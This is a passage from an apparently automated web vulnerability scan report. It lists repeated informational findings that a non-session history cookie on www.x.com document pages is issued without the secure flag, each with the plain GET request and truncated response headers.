Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.107. https://www.x.com/docs/DOC-1613

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.108. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.109. https://www.x.com/docs/DOC-2346

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.110. https://www.x.com/docs/DOC-3201

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.111. https://www.x.com/docs/DOC-3212

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.112. https://www.x.com/docs/DOC-3251

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.113. https://www.x.com/docs/DOC-3271

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.114. https://www.x.com/docs/DOC-3321

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.115. https://www.x.com/docs/DOC-3322

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.116. https://www.x.com/docs/DOC-3323

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.117. https://www.x.com/docs/DOC-3345

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.118. https://www.x.com/docs/DOC-3351

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.119. https://www.x.com/docs/DOC-3352

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.120. https://www.x.com/docs/DOC-3353

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.121. https://www.x.com/docs/DOC-3354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.122. https://www.x.com/docs/DOC-3355

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.123. https://www.x.com/docs/DOC-3371

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.124. https://www.x.com/docs/DOC-3372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.125. https://www.x.com/docs/DOC-3373

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.126. https://www.x.com/docs/DOC-3374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
